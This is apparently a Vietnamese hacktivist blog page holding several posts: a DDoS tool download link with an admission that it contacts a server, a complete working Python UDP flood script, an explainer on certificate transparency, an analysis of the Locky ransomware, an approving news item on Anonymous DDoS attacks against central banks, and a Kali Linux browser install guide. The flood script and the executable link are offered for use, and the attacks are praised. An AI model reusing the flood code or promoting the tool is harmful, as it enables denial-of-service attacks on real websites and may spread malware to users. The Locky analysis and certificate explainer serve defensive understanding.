Thứ Hai, 29 tháng 8, 2016

[DDOS] areas Code DDos


Đây là tool ddos mình search trên mạng và có config thêm một ít để cho tool đc mạnh hơn. DDOS 5p ở 10 máy khác nhau web liền bị Request time out và sau 30p mới trở lại bt.
Mih share để học tập trao đổi, không khuyến khích đi phá phách người khác.

http://t8ndh.biz/DDOS.exe


Seri search trên mạng nhek. Có đầy ah

tool ddos thì pải có virust mà. Mấy chú có hiểu tool ddoss là j ko thế. ko có keylog, đám bảo đây, thì e đã bảo e config lại cho nó nhận mạnh hơn thông qua hệ thống có sẵn tích hợp perl thui

E nói rõ là tool này hoạt động giống như tool thường nhưng khi ddos nó sẽ gởi info lên server để có thể tiến hành gởi socket bằng perl sẽ khiến server nhanh die hơn là chỉ ddos appche ko. Ai ko dùng thì đừng tak mắc lòng e nghen

Ko hề có keylog cũng như bất cứ j ăn cắp thôgn tin.

Ah, tiện thể đây có bác nào nghiên cứu về ddos ko pm anons44 để hợp tác làm tool nhek

[DDOS] areas ~)) share code python strong !!

#!/usr/bin/python
import socket
import threading
import random
import sys

 ############################################
 # Author:Jo3
 # Contact: http://gloomyhackingteam.blogspot.com/
 ############################################


class attack(threading.Thread):
     def __init__ (self, ip, port, psize):
         threading.Thread.__init__(self)
         self.ip = ip
         self.port = port
         self.psize = psize

     def run(self):
         print "Dang tan cong " + self.ip + ":" + str(self.port) + "."
         sock = socket.socket(socket.AF_INET,socket.SOCK_DGRAM)
         bytes = random._urandom(self.psize)
         while True:
             sock.sendto(bytes,(self.ip, self.port))


if len(sys.argv) < 2:
     print "tin nhan: "+ sys.argv[0] +" IP  PORT  PACKETSIZE 1024 10)"
     sys.exit()

try:
     threads = sys.argv[4]
except NameError:
     threads = 10
except IndexError:
     threads = 10

try:
     if int(sys.argv[3]) > 0 and int(sys.argv[3]) <= 65500:
         psize = int(sys.argv[3])
         print psize
     else:
         psize = 1024
except IndexError:
     psize = 1024


for host in range(int(threads)):
     try:
         port = sys.argv[2]
     except IndexError:
         port = random.randrange(1, 65535, 2)
     at = attack(sys.argv[1], int(port), int(psize))

     at.start()



Chủ Nhật, 28 tháng 8, 2016

[DDOS] areas Tìm hiểu về certificate transparency giúp phát hiện chứng chỉ SSL giả mạo

Một backdoor khổng lồ tồn tại trên mạng Internet mà không phải ai cũng biết. Để đảm bảo bảo mật và toàn vẹn dữ liệu cá nhân, hàng tỉ người dùng Internet vẫn đang đặt niềm tin “mù quáng” vào các nhà cung cấp chứng thực số (certificate authority, viết tắt là CA).

Certificate Authority là gì?


Một Certificate Authority (CA) là một tổ chức bên thứ ba hoạt động như một trung gian đáng tin cậy, cấp phát và thẩm định chứng chỉ số SSL/TLS.

Có hàng trăm tổ chức tin cậy như vậy có quyền cấp phát chứng chỉ SSL hợp lệ cho bất cứ domain (tên miền) nào đó của người dùng, dù domain đó đã được cấp chứng chỉ bởi CA khác. Và đó chính là điểm yếu lớn nhất trong hệ thống CA.

Vào năm 2015, Google đã phát hiện ra tổ chức CA Symantec cấp phát trùng lặp chứng chỉ google.com cho một người dùng khác. Đó không phải là vụ việc đầu tiên ảnh hưởng nghiêm trọng đến quyền riêng tư của người dùng. Vào tháng 3/2011, tổ chức CA Comodo đã bị hack và cấp phát chứng chỉ giả mạo của các tên miền phổ biến như mail.google.com, addons.mozilla.org, và login.yahoo.com.

Tài liệu rò rỉ của nhân viên Edward Snowden cho biết Cơ quan An ninh Quốc gia NSA đã can thiệp và bẻ khóa hàng loạt phiên làm việc HTTPS đã được mã hóa. Điều này dấy lên nghi ngờ các cơ quan CA được kiểm soát bởi chính phủ.

Các vụ việc liên quan tới chính phủ

Năm 2011, chứng chỉ số giả mạo cấp phát bởi tổ chức CA DigiNotar đã được sử dụng để tấn công tài khoản Gmail của 300,000 người dùng Iran.

Cuối năm 2013, Google phát hiện chứng chỉ số giả mạo tên miền của mình được sử dụng bởi cơ quan chính phủ Pháp nhằm thực hiện các cuộc tấn công Man-in-the-Middle.


Giữa năm 2014, Google phát hiện một sự cố khác: National Informatics Centre (tổ chức đứng đầu về khoa học công nghệ Ấn Độ) đã sử dụng một vài chứng chỉ số không ủy quyền trên tên miền của mình.

Hệ thống Certificate Transparency là gì?


Certificate Transparency hay CT là một framework mã nguồn mở cho phép cá nhân và tổ chức theo dõi số lượng chứng chỉ bảo mật đã được cấp phát riêng cho domain của họ. CT framework bao gồm:

  • Certificate Logs
  • Certificate Monitors
  • Certificate Auditors

CT yêu cầu các CA khai báo (vào Certificate Log) mọi chứng chỉ số mà cơ quan này tạo ra. Certificate Log sau đó sẽ cung cấp cho người dùng cách thức tìm kiếm tất cả các chứng chỉ số đã được cấp phát cho một domain cho trước. Mô hình CT không thay thế quá trình xác thực hay quy trình thẩm định chứng chỉ số thông thường, đây là một phương pháp bổ sung giúp xác định chứng chỉ của người dùng là duy nhất hay không.

Certificate log có ba đặc tính quan trọng sau:

  1. Chỉ thêm: Các bản ghi chứng chỉ khi đã được thêm vào log sẽ không thể xóa, sửa hay chèn vào những bản ghi cũ.
  2. Mã hóa an toàn: Certificates Log sử dụng một cơ chế mã hóa đặc biệt có tên Merkle Tree Hashes’ nhằm ngăn chặn bị can thiệp.
  3. Kiểm tra công khai: Bất cứ ai cũng có thể truy vấn đến log hoặc kiểm tra chứng chỉ SSL đã được thêm vào log hay chưa.

Trong CT, các chứng chỉ số sẽ chứa một mốc thời gian kí số minh chứng cho việc nó đã được gửi vào Certificates Log trước khi được cấp phát.

Google, DigiCert, Symantec, và một vài CA khác hiện tại đã đăng tải log công khai.


Dù CT không ngăn được CA cấp chứng chỉ giả mạo nhưng nó giúp quá trình phát hiện trở nên dễ dàng hơn.

Người dùng có thể sử dụng công cụ Certificate Transparency Search của Comodo hoặc Certificate Transparency Lookup Tool của Google để kiểm tra tất cả các chứng chỉ bảo mật các tên miền hiện diện công khai trong Certificate Transparency logs.

Read more: http://www.nvm-anons44.blogspot.co.id/2016/08/tim-hieu-ve-certificate-transparency.html#ixzz4IdLfCNs7


#ANONS44

[DDOS] areas PHÂN TÍCH MÃ ĐỘC TỐNG TIỀN LOCKY

Vào tháng 2/2016, mạng Internet đã bị rúng động vì một loại mã độc tống tiền (ransomware) mới có tên là Locky. Theo báo cáo cho thấy mã độc tống tiền Locky đã lây lan người dùng hơn 114 quốc gia trên thế giới. Phân tích mẫu mã độc cho thấy đây là một loại Trojan hoàn toàn mới. Vậy Locky là gì và làm sao có thể chống lại mã độc này? Hãy cùng tìm hiểu.

Cách thức phát tán

Để phát tán một lọai Trojan, tin tặc thường gửi spam lượng lớn email cùng với các tệp tin đính kèm độc hại. Tệp tin đính kèm ở đây là một tệp tin văn bản .DOC chứa macro độc hại tải Locky Trojan từ máy chủ về máy tính nạn nhân và thực thi nó.

Tin nhắn rác chứa tài liệu đính kèm độc hại​

Một đoạn mã của macro độc hại​

Các phiên bản Microsoft Office mới thường vô hiệu hóa chạy macro tự độc vì lí do bảo mật. Tuy nhiên, thực tế cho thấy người dùng rất thường xuyên kích hoạt thủ công macro, thậm chí ngay cả trên tài liệu tải về từ nguồn không rõ ràng, dẫn đến hậu quả khó lường.

Hiện tại, tin tặc đã thay đổi các tệp tin đính kèm thành tệp tin nén ZIP chứa một hoặc nhiều đoạn mã JavaScript được làm rối nhằm che mắt người dùng. Tin nhắn rác được gửi đến thường được viết bằng tiếng Anh, cũng có một vài ngôn ngữ khác được sử dụng.

Thư rác được viết bằng tiếng Anh với một tệp tin đính kèm được nén​

Thư rác được viết bằng tiếng Anh và tiếng Đức​

Người dùng sẽ được thông báo khởi động các tệp tin script​

Nội dung tệp tin đính kèm đã được nén​

Một đoạn mã script trong tệp tin nén​

Nếu được kích hoạt, đoạn mã script sẽ tải về Locky Trojan từ máy chủ trên Internet và khởi chạy nó.​

Các quốc gia bị tấn công

Danh sách 10 quốc gia bị lây nhiễm nhiều nhất

Tên quốc giaSố lượng người dùng bị tấn công
Pháp469
Đức340
Ấn Độ​267
Hoa Kỳ224
Nam Phi182
Ý171
Mexico159
Brazil156
Trung Quốc126
Việt Nam​107

Cần lưu ý rằng thống kê trên chỉ bao gồm những trường hợp mã độc Locky được phát hiện bởi các công cụ diệt virus và không bao gồm các phát hiện giai đoạn đầu như thư rác hoặc các phần mềm độc hại tự động tải mã độc.


Cách thức hoạt động

Locky Trojan là một tệp tin thực thi, có dung lượng khoảng 100 kb. Nó được viết bằng ngôn ngữ C++ sử dụng STL và được biên dịch bởi Microsoft Visual Studio. Khi được khởi động, mã độc sẽ tự sao chép đến %TEMP%\svchost.exe và xóa luồng dữ liệu NTFS trên ổ đĩa cứng – điều này được thực hiện nhằm đảm bảo khi thực thi, Windows không hiển thị cảnh báo rằng tệp tin được tải về từ Internet và có thể gây nguy hiểm. Trojan Locky sẽ được chạy từ thư mục %TEMP%.

Mã độc sẽ kiểm tra sự tồn tại và nội dung của các khóa registry sau:

Đường dẫn​Kiểu​Giá trị​
HKEY_CURRENT_USER\Software\Locky\id​REG_SZInfection ID
HKEY_CURRENT_USER\Software\Locky\pubkey​REG_BINARY​Public RSA key in MSBLOB format
HKEY_CURRENT_USER\Software\Locky\paytext​​REG_BINARY​Text shown to the victim
HKEY_CURRENT_USER\Software\Locky\completed​REG_DWORD​Status (whether encryption is completed)​

Nếu dữ liệu trên tồn tại trong các khóa registry (có nghĩa là Trojan này đã từng được chạy nhưng bị dừng lại vì lí do nào đó), Locky sẽ đọc dữ liệu và tiếp tục quá trình lây nhiễm. Với lần chạy đầu tiên, Locky sẽ thực hiện các hành vi sau:
  1. Liên lạc với máy chủ điều khiển C&C và báo cáo lây nhiễm
  2. Nhận một khóa công khai RSA-2048 và ID lây nhiễm từ máy chủ điều khiển, lưu vào registry
  3. Gửi thông tin về ngôn ngữ của hệ điều hành bị lây nhiễm, nhận thông báo hiển thị đòi tiền chuộc từ tin tặc, lưu thành dạng text trong registry
  4. Tìm kiếm các tệp tin với phần mở rộng cụ thể trên ổ đĩa cứng của máy bị lây nhiễm, mã hóa chúng
  5. Xóa các bản sao chép shadow copies của các tệp tin
  6. Ghi mã độc vào phần tự khởi động (HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run)
  7. Tìm kiếm và mã hóa các tệp tin có phần mở rộng đặc biệt trên các ổ đĩa của mạng chia sẻ và trên các tài nguyên mạng không được gán tên ổ đĩa
  8. Hiển thị thông điệp đòi tiền chuộc đến nạn nhân
  9. Dừng hoạt động và tự xóa


Đoạn mã xác định ngôn ngữ của hệ điều hành​

Danh sách các tệp tin bị mã hóa​

Mã độc Locky sẽ tìm kiếm các tệp tin có phần mở rộng sau đây:

Danh sách các phần mở rộng của tệp tin sẽ bị mã hóa​

Mã độc locky thêm đoạn mã vào cuối mỗi tệp tin mã hóa​

Với mỗi tệp tin phù hợp, mã độc Locky sẽ tạo ra một khóa 128-bit và mã hóa nội dung tệp tin với thuật toán AES-128 trong chế độ CTR. Tệp tin bị mã hóa sẽ có tên .locky . Cấu trúc sau sẽ được thêm vào phần cuối của tệp tin:​

Trong cú pháp ngôn ngữ C, đoạn mã trên được giải thích như sau:​

struct file_data
{
uint32_t start_marker; //Structure start marker = 0x8956FE93
char id[16]; //Infection ID
uint8_t aes_key[256]; //AES key encrypted with RSA-2048
uint32_t name_marker; //Name start marker encrypted with AES (= 0xD41BA12A after decryption)
uint8_t orig_name[520]; //Original file name encrypted with AES
WIN32_FILE_ATTRIBUTE_DATA attr; //Original file attributes encrypted with AES
};​

Thông điệp đòi tiên chuộc

Sau khi mã hóa tệp tin của người dùng, Trojan Locky sẽ hiển thị thông điệp dưới đây:


Thông điệp đòi tiền chuộc bằng tiếng Anh​



Thông điệp đòi tiền chuộc bằng tiếng Đức​


Trong những chiến dịch tấn công đầu tiên, trang thanh toán tiền chuộc sẽ có dạng như sau:


Trang thanh toán của Locky phiên bản đầu tiên​


Trong trang này, tin tặc đề nghị nạn nhân trả tiền dưới dạng bitcoin để được giải mã các tệp tin bị mã hóa trên máy tính. Tin tặc cũng đưa ra hướng dẫn cách thanh toán bằng đồng tiền bitcoin.​

Nội dung và thiết kế của trang thanh toán hiện tại đã thay đổi, có sẵn hơn 20 ngôn ngữ để lựa chọn:​


Trang thanh toán của Locky phiên bản mới nhất​


Trong mã nguồn ta có thể thấy danh sách đầy đủ các ngôn ngữ được hỗ trợ. Tin tặc đang làm hết mình để có thể giao tiếp với nạn nhân tại các quốc gia lớn bị tấn công. Tuy nhiên, ngôn ngữ Nga và ngôn ngữ các quốc gia thuộc liên bang Nga cũ lại không hề có trong danh sách.​


Danh sách các ngôn ngữ được hỗ trợ trên trang thanh toán của Locky​


Kết nối với máy chủ điều khiển (C&C)​
Trong đoạn mã của Locky chứa từ 1 đến 3 địa chỉ IP của máy chủ C&C. Đoạn mã dùng thuật toán tạo ra địa chỉ C&C mới (DGA, thuật toán tạo tên miền) dựa trên ngày tháng năm hiện tại. Với thuật toán này, 6 địa chỉ C&C được tạo ra mỗi ngày. Đoạn mã giả cho thấy thuật toán DGA được đánh dấu trong hình dưới đây:


Đoạn mã giả thuật toán tạo tên miền C&C Locky​


Kết nối đến một C&C được thực hiện thông qua giao thức HTTP. Mã độc Locky gửi một yêu cầu POST request đến địa chỉ với định dạng http:///main.php; dữ liệu truyền tải sẽ được mã hóa với một thuật toán đối xứng đơn giản.​

Các dạng thông số được gửi đi bao gồm:​

1, Thông báo về lây nhiễm thành công và yêu cầu khóa

id=
&act=getkey&affid=
&lang=
&corp=
&serv=
&os=
&sp=
&x64=

2, Gửi danh sách các đường dẫn bị mã hóa

id=
&act=report&data=

Với mỗi ổ đĩa đã được xử lý, Locky sẽ gửi dến máy chủ điều khiển một danh sách tất cả đường dẫn của tất cả các tệp tin.​

3, Gửi thống kê mỗi ổ đĩa cứng được xử lý

id=
&act=stats&path=
&encrypted=
&failed=
&length=

Tin tặc thu thập số liệu thống kê rất chi tiết về mỗi thiết bị lẫy nhiêm. Các họ mã độc tống tiền khác thường không làm việc này.

Các biện pháp ngăn chặn 
Locky là một loại mã độc tống tiền điển hình. Tuy nhiên nó lại khiến các nhà nghiên cứu bảo mật chú ý bởi sự linh hoạt và phát tán rộng rãi. Để bảo vệ bản thân khỏi loại mã độc tống tiền Locky, thực hiện các biện pháp sau:
  • Không mở các tệp tin đính kèm trong email được gửi từ nguồn không rõ ràng.
  • Sao lưu dữ liệu định kì và lưu trữ bản sao sao lưu trên một thiết bị lưu trữ tách khác rời hoặc lưu trữ trên cloud.
  • Thường xuyên cập nhật phần mềm diệt virus, hệ điều hành và các phần mềm cài đặt trên máy tính.
  • Tạo một thư mục mạng riêng biệt với mỗi người dùng khi quản lý truy cậ


Read more: http://www.nvm-anons44.blogspot.co.id/2016/08/phan-tich-ma-oc-tong-tien-locky.html#ixzz4IdKyAKF6

Hacking News : Anonymous đánh sập 20 ngân hàng trung ương trong chiến dịch tấn công vào hệ thống ngân hàng toàn cầu

Chiến dịch này đã xuất sắc hướng vào các chủ sở hữu ngân hàng hàng đầu, không phải dân thường.

Một tổ chức Hacker két tiếng, gọi chung là Anonymous đã hợp tác kêu gọi các nhóm hacker khác tung ra một chiến dịch lớn gọi là Oplcarus nhằm vào các "cartel ngân hàng tham nhũng".

Nạn nhân đầu tiên của họ là Ngân hàng Trung ương Hy Lạp, sau đó ảnh hưởng mạnh tới các ngân hàng từ các quốc gia còn lại như Cục Dự Trữ Liên Bang Hoa Kỳ Boston, Ngân hàng Anh và Ngân hàng Pháp,

Anonymous đã giải thích ý định của họ trong một thông báo:

"Các ngân hàng đã gián tiếp tới việc giết người, lừa đảo, âm mưu, trục lợi chiến tranh, rửa tiền cho những kẻ khủng bố và băng đảng ma tuý. Đã làm hàng triệu người ra đường phố sống mà không có thức ăn và mua chuộc các chính phủ để họ im lặng. Chúng tôi đại diện cho những người không có tiếng nói."

Cuộc tấn công này đã đánh thẳng vào trái tim Chủ nghĩa đế quốc phương tây, một số ngân hàng đã phải trì trệ hàng giờ mới có quyền truy cập trở lại máy chủ của mình để còn tiếp tục giao dịch. Nhiều người đã đặt câu hỏi về sự hiệu quả của Oplcarus, giám đốc cấp cao Stephanie Weagle của Công ty bảo mật mạng Corero đã nói với một tạp chí Thông tin an ninh mạng:

"Trong khi tác động vào các mục tiêu cá nhân (Cartel ngân hàng) bằng các chiến dịch DDoS, mục đích của "Oplcarus" không hề rõ ràng, nó đã đánh sập hoàn toàn hệ thống máy chủ email sẵn có. Trong một thế giới mạng trực tuyến muốn đánh sập bất kỳ loại dịch vụ nào đó hầu như là không thể, đặc biệt là trong nghành công nghiệp ngân hàng, nơi giao dịch và thông tin liên lạc thường rất nhạy cảm, và bảo mật tài khoản là cực kỳ quan trọng."

*Hậu quả chúng ta đã thấy một tài khoản của ngân hàng Vietcombank bị hack tiền.*
Mặc dù các tin tặc chỉ có thể xâm nhập vào hệ thống máy chủ Email ở một số ngân hàng như Ngân hàng Anh nhưng thiệt hại của nó là quá lớn.


Anonymous muốn đánh vào top 1% giới giàu có chứ không ảnh hưởng tới người dân khi họ giao dịch với ngân hàng, để làm rõ những mục tiêu của họ ta hãy xem ở cuộc phỏng vấn với The Free Thought Project:

"Chúng tôi muốn làm cho rõ ràng rằng tất cả mục tiêu của #Oplcarus là hệ thống ngân hàng Rothschild, BIS và hệ thống ngân hàng trung ương thế giới. Thực tế rằng các mục tiêu chúng tôi đã tấn công cho tới nay chẳng hạn như Guernsey, Cyprus, Panama, Jordan, British Virgin Isles, .v.v là top 10 thiên đường thuế cho giới thượng lưu. Không hề phá các tài khoản người dùng bị hại, không có máy ATM nào bị chặn và không có dữ liệu khách hàng nào bị rò rỉ. Đây đơn giản chỉ là một cuộc biểu tình chống lại các Ngân hàng trung ương và top 1% giới giàu có, không hề có người vô tội hay nghèo bị hại."

Như vậy, có một số nhóm Hacker khác nhau đã cùng tham gia chiến dịch này. Bao gồm cả Ghost Squad Hackers đã chụp ảnh màn hình của site admin các Ngân hàng họ tấn công. Mặc dù cuối cùng các ngân hàng bị tấn công đều trở lại trực tuyến nhưng hậu quả để lại và khắc phục là cực kỳ lâu dài.


Read more: http://www.nvm-anons44.co.id/2016/08/anonymous-anh-sap-20-ngan-hang-trung.html#ixzz4IdK6MU35


#ANONS44

Hướng dẫn cài đặt hệ điều hành kali linux trên trình duyệt web

Đây là tin vui đối với hacker và các chuyên gia nghiên cứu bảo mật: Bạn đã có thể sử dụng hệ điều hành Kali Linux ngay trong một trình duyệt web. Kali Linux là một trong những bản phân phối được cộng đồng bảo mật yêu thích nhất và giờ đã được tích hợp vào trình duyệt web có tên KaliBrowser


Nhà nghiên cứu an ninh mạng Jerry Gamblin đã tạo ra một dự án mang tên KaliBrowser cho phép người dùng sử dụng hệ điều hành Kali Linux trong một trình duyệt web. Gamblin sử dụng kết hợp Kali Linux Docker image, công cụ quản lý cửa sổ Openbox và NoVNC HTML5-based VNC client trong trong trình duyệt của mình.

Kali Linux là một trong những hệ điều hành kiểm thử bảo mật hàng đầu dựa trên nhân Linux kernel và kế thừa thành công của phiên bản cũ là BackTrack. Kali Linux đã được nâng cấp lên phiên bản 2016.1 Debian GNU/Linux 8 “Jessie”.


Trình duyệt KaliBrowser có thể chạy trên tất cả các hệ điều hành bao gồm phiên bản mới nhất của Microsoft Windows 10. Chi tiết cách cài đặt như sau:

Download và cài đặt Docker

Các bước cài đặt Docker

Mở terminal của Docker (Start All Programs > Docker Docker Quickstart Terminal) và gõ lệnh cài đặt Openbox và NoVNC

Cài đặt Openbox 
git clone git://git.openbox.org/mikachu/openbox
Cài đặt NoVNC 
git clone git://github.com/kanaka/noVNC.git

Cài đặt openbox

Cài đặt NoVNC

*Các bạn chú ý cái địa chỉ IP màu xanh trên cửa sổ Docker và lưu lại để lát truy cập vào.

Cuối cùng, cài đặt KaliBrowser (Trình duyệt Kali)

Gõ lệnh bên dưới để tiến hành cài đặt KaliBrowser cơ bản:

docker run -d -t -i -p 6080:6080 jgamblin/kalibrowser

Cài đặt trình duyệt Kali

Sau khi quá trình cài đặt hoàn tất, mở trình duyệt Kalibrowser và truy cập địa chỉ:

http://ip:6080

Với ip là địa chỉ IP màu xanh ở trên (ở bên mình là 192.168.99.100) Vậy nên địa chỉ truy cập sẽ là

http://192.168.99.100:6080

Khởi động KaliBrowser

Một màn hình đen thui xuất hiện, hãy ấn nút chuột phải để sử dụng, mở bất kì trình command nào để gõ lệnh nhằm cài đặt thêm phần mềm vào Kali (mình hay sử dụng xterm), ví dụ: 

apt-get install <phần mềm>


Lưu ý: đây là bản cài đặt cơ bản của Kali Linux (dung lượng 841 M8), do đó người dùng cần cài thêm một số công cụ khi muốn sử dụng. Hoặc người dùng có thể cài đặt phiên bản nâng cao (dung lượng 2 G8) cài đặt sẵn Kali Top 10 metapackage thông qua lệnh:

docker run -d -t -i -p 6080:6080 jgamblin/kalibrowser-top10


Read more: http://www.nvm-anons44.co.id/2016/08/su-dung-he-ieu-hanh-kali-linux-tren.html#ixzz4IdJIoOXr

CLAY was here - No system is Safe

Anons47-Profiles . Được tạo bởi Blogger.

Wikipedia

Kết quả tìm kiếm

Populars !!

Anonymous - Message to the Citizens of the World VI

When you have a government that operates without limits, who proclaims the right to arrest, torture and kill anyone any, anywhere, with...

Column 1

Sitemap

Tìm kiếm Blog này

Tools For DDoSing

Một cuộc tấn công từ chối dịch vụ (tấn công DoS - Viết tắt của Denial of Service) hay tấn công từ chối dịch vụ phân tán (tấn công DDoS - Viết tắt của Distributed Denial of Service) là một nỗ lực làm cho những người dùng không thể sử dụng tài nguyên của một máy tính.
See all Movies

Hacking News

Anons47 Informations

Recent Posts

  • :) - Anons44 Minh Tricker Hacker

Pictures

Pictures
Images

ANONYMOUS GRUOPS

ANONYMOUS GRUOPS

ANONYMOUS - ANONS47

ANONYMOUS - ANONS47
^

Translate

Page Fans

Entri Populer

Entri Populer

 
#WALKERS111 © 2011 Templates | uzanc